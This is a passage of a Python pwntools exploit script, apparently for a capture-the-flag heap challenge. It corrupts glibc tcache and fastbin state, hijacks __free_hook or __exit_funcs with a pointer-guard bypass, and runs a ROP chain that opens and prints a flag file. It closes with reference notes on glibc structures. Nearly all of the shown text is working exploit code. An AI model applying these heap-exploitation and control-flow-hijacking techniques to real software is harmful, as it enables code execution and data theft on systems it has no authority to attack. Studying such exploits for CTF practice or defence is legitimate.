rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

ropchain_addr = heap_base + 0xE00
ropchain = flat([add_rsp_0x28, ropchain_addr, rdi2rdx, 0, rdx2rsp])
ropchain += p64(0) # padding
ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

for i in range((len(ropchain) + 8) // 0x10):
    arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# prepare buffer for FSOP: make the 0x1D0 tcache bin hand out memory next to __free_hook.
# NOTE(review): presumably chosen so that, once the source buffer is copied there,
# ropchain[2] (rdi2rdx) lands exactly on __free_hook -- confirm in a debugger.
arbitrary_write(heap_base + 0x160, p64(0) + p64(libc_base + libc.sym['__free_hook'] - 0x10)) # tcache bin (0x1D0) = &__free_hook - 0x10
arbitrary_write(heap_base + 0x40, p64(0x1000000000000) + p64(heap_base + 0xE00)) # tcache count (0x1D0) = 1; the second qword rewrites _IO_buf_base with the same value as before

# clear fastbin
edit(0, "\x07")
delete(1)
edit(1, p64(heap_base >> 12))
edit(0, "\x00")
add(1)

# trigger exit
delete(1)
edit(0, "\x02")
edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
add(1)
add(2)
####################################


# #################################### Method 2: hijack __exit_funcs
# # leak heap base
# add(0)
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# heap_base = u64(p.recv(8)) << 12

# # leak libc base
# for i in range(0x23):
#     add(1)
# add(2)
# delete(1)
# delete(2)
# edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
# add(1)
# add(1)
# edit(1, p64(0) + p64(0x421))
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# # malloc tcache_struct
# add(1)
# delete(0)
# delete(1)
# edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
# add(0)
# add(0) # chunk 0 points to tcache_struct

# # prepare fastbin
# add(1)
# for i in range(5):
#     add(2)
#     edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1ed630 - 0x10) ^ (heap_base >> 12))) # fs:[0x30] (pointer guard)
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change fs:[0x30] to (heapbase + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)
# edit(0, "\x00") # "clear" the tcache bin
# add(1)
# __pointer_chk = (heap_base + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # ORW
# def orw_payload(libc_base, orwchain_base):
#     pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
#     pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
#     pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
#     func_cnt = 3
#     args_cnt = 2 + 3 + 1
#     payload = ""
#     payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
#     payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
#     payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
#     payload += "./flag"
#     return payload

# rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
# rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
# add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

# ropchain_addr = heap_base + 0xA00
# ropchain = flat([add_rsp_0x28, ropchain_addr, 0, 0, rdx2rsp])
# ropchain += p64(0) # padding
# ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

# for i in range((len(ropchain) + 8) // 0x10):
#     arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# # forge __exit_function
# edit(0, "\x00") # "clear" the tcache bin
# arbitrary_write(heap_base + 0x10, p64(0) + p64(1)) # exit_function_list->next = NULL, exit_function_list->idx = 1
# encoded_rdi2rdx = rdi2rdx ^ __pointer_chk
# encoded_rdi2rdx = ((encoded_rdi2rdx << 17) & ((1 << 64) - 1)) | (encoded_rdi2rdx >> (64 - 17))
# arbitrary_write(heap_base + 0x20, p64(4) + p64(encoded_rdi2rdx)) # exit_function_list->fns[0].flavor = ef_cxa(0x4), exit_function_list->fns[0].cxa.fn = rdi2rdx
# arbitrary_write(heap_base + 0x30, p64(ropchain_addr)) # exit_function_list->fns[0].cxa.arg = ropchain_addr

# # prepare fastbin
# add(1)
# for i in range(5):
#     add(2)
#     edit(2, p64((heap_base + 0x3f0 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1E0738 - 0x18) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x3d0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change __exit_funcs
# edit(0, "\x00") # "clear" the tcache bin
# add(1)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # trigger exit
# delete(1)
# edit(0, "\x02")
# edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
# add(1)
# add(2)
# ##################################### 

success("libc_base: " + hex(libc_base))
success("heap_base: " + hex(heap_base))

p.interactive()

'''
__exit_funcs (struct exit_function_list *):

struct exit_function_list
{
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
};

struct exit_function
{
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
    {
        void (*at) (void);
        struct
        {
            void (*fn) (int status, void *arg);
            void *arg;
        } on;
        struct
        {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
        } cxa;
    } func;
};
'''

'''
_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset           member
0x0              l_addr         (point to program base by default)
0x18             l_next         (point to next link map, the length of the linked list should be no smaller than 4, and the tail node's l_next = 0)
0x20             l_prev         (point to previous link map, head node's l_prev = 0)
0x110            l_info[0x1A]   (
                                    point to fini_array Elf64_Dyn structure:
                                    typedef struct
                                    {
                                    Elf64_Sxword	d_tag;			/* Dynamic entry type */
                                    union
                                        {
                                            Elf64_Xword d_val;		/* Integer value */             
                                            Elf64_Addr d_ptr;	    /* Address value */       
                                                                    // l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
                                        } d_un;
                                    } Elf64_Dyn;)
                                )
0x120            l_info[0x1C]   (point to fini_array_size Elf64_Dyn structure)        //  l_info[0x1C]->d_un.d_val= sizeof(fini_array)
'''


'''
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */              0x10

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */                                  0x18
  char *_IO_read_end;	/* End of get area. */                                      0x20
  char *_IO_read_base;	/* Start of putback+get area. */                            0x28
  char *_IO_write_base;	/* Start of put area. */                                    0x30
  char *_IO_write_ptr;	/* Current put pointer. */                                  0x38
  char *_IO_write_end;	/* End of put area. */                                      0x40
  char *_IO_buf_base;	/* Start of reserve area. */                                0x48
  char *_IO_buf_end;	/* End of reserve area. */                                  0x50

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */              0x58
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */     0x60
  char *_IO_save_end; /* Pointer to end of non-current get area. */                 0x68

  struct _IO_marker *_markers;                                                      0x70

  struct _IO_FILE *_chain;                                                          0x78

  int _fileno;                                                                      0x80
  int _flags2;                                                                      0x84
  __off_t _old_offset; /* This used to be _offset but it's too small.  */           

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
'''